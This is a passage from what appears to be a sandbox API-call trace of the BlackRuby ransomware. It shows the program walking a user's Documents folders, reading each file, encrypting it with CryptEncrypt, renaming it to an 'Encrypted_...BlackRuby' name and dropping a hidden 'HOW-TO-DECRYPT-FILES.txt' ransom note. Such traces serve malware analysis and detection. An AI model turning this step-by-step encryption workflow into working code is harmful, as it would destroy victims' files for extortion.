"c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\l0hjbsuibsvizkxwlps\\encrypted_johmihy1fruhmrhcuhlxtr25pxukqhmpsrlk.blackruby")) returned 1 [0058.554] GetLastError () returned 0xb7 [0058.555] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x65 [0058.555] GetLastError () returned 0xb7 [0058.555] SetErrorMode (uMode=0x1) returned 0x0 [0058.555] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\l0hjbsuibsvizkxwlps\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.568] GetLastError () returned 0x0 [0058.568] GetFileType (hFile=0x184) returned 0x1 [0058.568] SetErrorMode (uMode=0x0) returned 0x1 [0058.568] GetFileType (hFile=0x184) returned 0x1 [0058.569] CloseHandle (hObject=0x184) returned 1 [0058.570] GetLastError () returned 0x0 [0058.570] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x65 [0058.570] GetLastError () returned 0x0 [0058.570] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\L0HJbsUIBSvizkXwLps\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0058.570] GetLastError () returned 0x0 [0058.570] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r", lpFilePart=0x0) returned 0x45 [0058.570] GetLastError () returned 0x0 [0058.570] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.570] GetLastError () returned 0x0 [0058.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0058.570] GetLastError () returned 0x0 [0058.570] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r", lpFilePart=0x0) returned 0x45 [0058.570] GetLastError () returned 0x0 [0058.570] SetErrorMode (uMode=0x1) returned 0x0 [0058.570] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360c20 [0058.570] GetLastError () returned 0x0 [0058.570] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.570] GetLastError () returned 0x0 [0058.570] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.570] GetLastError () returned 0x0 [0058.570] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.570] GetLastError () returned 0x0 [0058.570] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.570] GetLastError () returned 0x0 [0058.570] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.570] GetLastError () returned 0x12 [0058.570] FindClose (in: hFindFile=0x360c20 | out: hFindFile=0x360c20) returned 1 [0058.571] SetErrorMode (uMode=0x0) returned 0x1 [0058.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r", lpFilePart=0x0) returned 0x45 [0058.571] GetLastError () returned 0x12 [0058.571] SetErrorMode (uMode=0x1) returned 0x0 [0058.571] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360c20 [0058.571] GetLastError () returned 0x12 [0058.571] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.571] GetLastError () returned 0x12 [0058.571] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.571] GetLastError () returned 0x12 [0058.571] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.571] GetLastError () returned 0x12 [0058.571] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.571] GetLastError () returned 0x12 [0058.571] FindNextFileW (in: hFindFile=0x360c20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.571] GetLastError () returned 0x12 [0058.571] FindClose (in: hFindFile=0x360c20 | out: hFindFile=0x360c20) returned 1 [0058.571] SetErrorMode (uMode=0x0) returned 0x1 [0058.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", lpFilePart=0x0) returned 0x5a [0058.571] GetLastError () returned 0x12 [0058.571] SetErrorMode (uMode=0x1) returned 0x0 [0058.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\5hcmfrlcortddky.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1d0f380 | out: lpFileInformation=0x1d0f380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150c31f0, ftCreationTime.dwHighDateTime=0x1d3526d, ftLastAccessTime.dwLowDateTime=0xeb9a94d0, ftLastAccessTime.dwHighDateTime=0x1d3580a, ftLastWriteTime.dwLowDateTime=0xeb9a94d0, ftLastWriteTime.dwHighDateTime=0x1d3580a, nFileSizeHigh=0x0, nFileSizeLow=0xadf1)) returned 1 [0058.571] GetLastError () returned 0x12 [0058.571] SetErrorMode (uMode=0x0) returned 0x1 [0058.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", lpFilePart=0x0) returned 0x5a [0058.571] GetLastError () returned 0x12 [0058.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", lpFilePart=0x0) returned 0x5a [0058.571] GetLastError () returned 0x12 [0058.571] SetErrorMode (uMode=0x1) returned 0x0 [0058.572] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\5hcmfrlcortddky.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.572] GetLastError () returned 0x0 [0058.572] GetFileType (hFile=0x184) returned 0x1 [0058.572] SetErrorMode (uMode=0x0) returned 0x1 [0058.572] GetFileType (hFile=0x184) returned 0x1 [0058.572] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0xadf1 [0058.572] GetLastError () returned 0x0 [0058.572] ReadFile (in: hFile=0x184, lpBuffer=0x1d11130, nNumberOfBytesToRead=0xadf1, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1d11130*, lpNumberOfBytesRead=0x18ec40*=0xadf1, lpOverlapped=0x0) returned 1 [0058.573] GetLastError () returned 0x0 [0058.573] CloseHandle (hObject=0x184) returned 1 [0058.573] GetLastError () returned 0x0 [0058.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", lpFilePart=0x0) returned 0x5a [0058.573] GetLastError () returned 0x0 [0058.573] SetErrorMode (uMode=0x1) returned 0x0 [0058.573] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\5hcmfrlcortddky.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150c31f0, ftCreationTime.dwHighDateTime=0x1d3526d, ftLastAccessTime.dwLowDateTime=0xeb9a94d0, ftLastAccessTime.dwHighDateTime=0x1d3580a, ftLastWriteTime.dwLowDateTime=0xeb9a94d0, ftLastWriteTime.dwHighDateTime=0x1d3580a, nFileSizeHigh=0x0, nFileSizeLow=0xadf1)) returned 1 [0058.573] GetLastError () returned 0x0 [0058.573] SetErrorMode (uMode=0x0) returned 0x1 [0058.611] CryptImportKey (in: hProv=0x37c818, pbData=0x1b8cc80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360f20) returned 1 [0058.611] GetLastError () returned 0x0 [0058.611] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.611] GetLastError () returned 0x0 [0058.616] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.616] GetLastError () returned 0x0 [0058.616] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360a20) returned 1 [0058.616] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.616] GetLastError () returned 0x0 [0058.616] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1bb9ccc*=0x1, dwFlags=0x0) returned 1 [0058.616] GetLastError () returned 0x0 [0058.616] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1bb9c98, dwFlags=0x0) returned 1 [0058.616] GetLastError () returned 0x0 [0058.616] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb9d14*, pdwDataLen=0x18ec30*=0xaef0, dwBufLen=0xaef0 | out: pbData=0x1bb9d14*, pdwDataLen=0x18ec30*=0xaef0) returned 1 [0058.617] GetLastError () returned 0x0 [0058.617] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bcfb20*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1bcfb20*, pdwDataLen=0x18ec48*=0x10) returned 1 [0058.617] GetLastError () returned 0x0 [0058.617] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bcfb50*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1bcfb50*, pdwDataLen=0x18ec50*=0x10) returned 1 [0058.617] GetLastError () returned 0x0 [0058.617] CryptDestroyKey (hKey=0x360f20) returned 1 [0058.617] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.617] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.617] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", lpFilePart=0x0) returned 0x5a [0058.617] GetLastError () returned 0x0 [0058.617] SetErrorMode (uMode=0x1) returned 0x0 [0058.617] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\5hcmfrlcortddky.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.618] GetLastError () returned 0xb7 [0058.619] GetFileType (hFile=0x184) returned 0x1 [0058.619] SetErrorMode (uMode=0x0) returned 0x1 [0058.619] GetFileType (hFile=0x184) returned 0x1 [0058.620] CloseHandle (hObject=0x184) returned 1 [0058.620] GetLastError () returned 0xb7 [0058.620] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx", lpFilePart=0x0) returned 0x5a [0058.620] GetLastError () returned 0xb7 [0058.620] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\Encrypted_Uiwlt4ff7XJJ3qPgvNLmgug0HGKsMa8L16Sgiop2.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\Encrypted_Uiwlt4ff7XJJ3qPgvNLmgug0HGKsMa8L16Sgiop2.BlackRuby", lpFilePart=0x0) returned 0x82 [0058.620] GetLastError () returned 0xb7 [0058.620] SetErrorMode (uMode=0x1) returned 0x0 [0058.620] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\5hcmfrlcortddky.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150c31f0, ftCreationTime.dwHighDateTime=0x1d3526d, ftLastAccessTime.dwLowDateTime=0xeb9a94d0, ftLastAccessTime.dwHighDateTime=0x1d3580a, ftLastWriteTime.dwLowDateTime=0x2b223f40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xaf00)) returned 1 [0058.620] GetLastError () returned 0xb7 [0058.620] SetErrorMode (uMode=0x0) returned 0x1 [0058.620] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\5hCMfRLCoRTDDkY.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\5hcmfrlcortddky.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\Encrypted_Uiwlt4ff7XJJ3qPgvNLmgug0HGKsMa8L16Sgiop2.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\encrypted_uiwlt4ff7xjj3qpgvnlmgug0hgksma8l16sgiop2.blackruby")) returned 1 [0058.621] GetLastError () returned 0xb7 [0058.621] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0058.621] GetLastError () returned 0xb7 [0058.621] SetErrorMode (uMode=0x1) returned 0x0 [0058.621] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.621] GetLastError () returned 0x0 [0058.621] GetFileType (hFile=0x184) returned 0x1 [0058.621] SetErrorMode (uMode=0x0) returned 0x1 [0058.621] GetFileType (hFile=0x184) returned 0x1 [0058.622] CloseHandle (hObject=0x184) returned 1 [0058.622] GetLastError () returned 0x0 [0058.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0058.623] GetLastError () returned 0x0 [0058.623] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0058.623] GetLastError () returned 0x0 [0058.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv", lpFilePart=0x0) returned 0x53 [0058.623] GetLastError () returned 0x0 [0058.623] SetErrorMode (uMode=0x1) returned 0x0 [0058.623] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\j2wcljwhs.csv"), fInfoLevelId=0x0, lpFileInformation=0x1bf7b1c | out: lpFileInformation=0x1bf7b1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc61a31d0, ftCreationTime.dwHighDateTime=0x1d34d0f, ftLastAccessTime.dwLowDateTime=0xdb19dda0, ftLastAccessTime.dwHighDateTime=0x1d352b5, ftLastWriteTime.dwLowDateTime=0xdb19dda0, ftLastWriteTime.dwHighDateTime=0x1d352b5, nFileSizeHigh=0x0, nFileSizeLow=0x22a2)) returned 1 [0058.623] GetLastError () returned 0x0 [0058.623] SetErrorMode (uMode=0x0) returned 0x1 [0058.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv", lpFilePart=0x0) returned 0x53 [0058.623] GetLastError () returned 0x0 [0058.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv", lpFilePart=0x0) returned 0x53 [0058.623] GetLastError () returned 0x0 [0058.623] SetErrorMode (uMode=0x1) returned 0x0 [0058.623] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\j2wcljwhs.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.623] GetLastError () returned 0x0 [0058.623] GetFileType (hFile=0x184) returned 0x1 [0058.623] SetErrorMode (uMode=0x0) returned 0x1 [0058.623] GetFileType (hFile=0x184) returned 0x1 [0058.624] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x22a2 [0058.624] GetLastError () returned 0x0 [0058.624] ReadFile (in: hFile=0x184, lpBuffer=0x1bf9d84, nNumberOfBytesToRead=0x22a2, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1bf9d84*, lpNumberOfBytesRead=0x18ec40*=0x22a2, lpOverlapped=0x0) returned 1 [0058.624] GetLastError () returned 0x0 [0058.624] CloseHandle (hObject=0x184) returned 1 [0058.624] GetLastError () returned 0x0 [0058.624] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv", lpFilePart=0x0) returned 0x53 [0058.624] GetLastError () returned 0x0 [0058.624] SetErrorMode (uMode=0x1) returned 0x0 [0058.624] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\J2WCljwhS.csv" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\j2wcljwhs.csv"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc61a31d0, ftCreationTime.dwHighDateTime=0x1d34d0f, ftLastAccessTime.dwLowDateTime=0xdb19dda0, ftLastAccessTime.dwHighDateTime=0x1d352b5, ftLastWriteTime.dwLowDateTime=0xdb19dda0, ftLastWriteTime.dwHighDateTime=0x1d352b5, nFileSizeHigh=0x0, nFileSizeLow=0x22a2)) returned 1 [0058.625] GetLastError () returned 0x0 [0058.625] SetErrorMode (uMode=0x0) returned 0x1 [0058.635] CryptImportKey (in: hProv=0x37c680, pbData=0x1c586c4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360ae0) returned 1 [0058.635] GetLastError () returned 0x0 [0058.635] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.635] GetLastError () returned 0x0 [0058.640] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.640] GetLastError () returned 0x0 [0058.640] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360de0) returned 1 [0058.640] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.640] GetLastError () returned 0x0 [0058.640] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1c85710*=0x1, dwFlags=0x0) returned 1 [0058.640] GetLastError () returned 0x0 [0058.640] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1c856dc, dwFlags=0x0) returned 1 [0058.640] GetLastError () returned 0x0 [0058.640] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c85758*, pdwDataLen=0x18ec30*=0x23a0, dwBufLen=0x23a0 | out: pbData=0x1c85758*, pdwDataLen=0x18ec30*=0x23a0) returned 1 [0058.640] GetLastError () returned 0x0 [0058.640] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c89ec4*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1c89ec4*, pdwDataLen=0x18ec48*=0x10) returned 1 [0058.640] GetLastError () returned 0x0 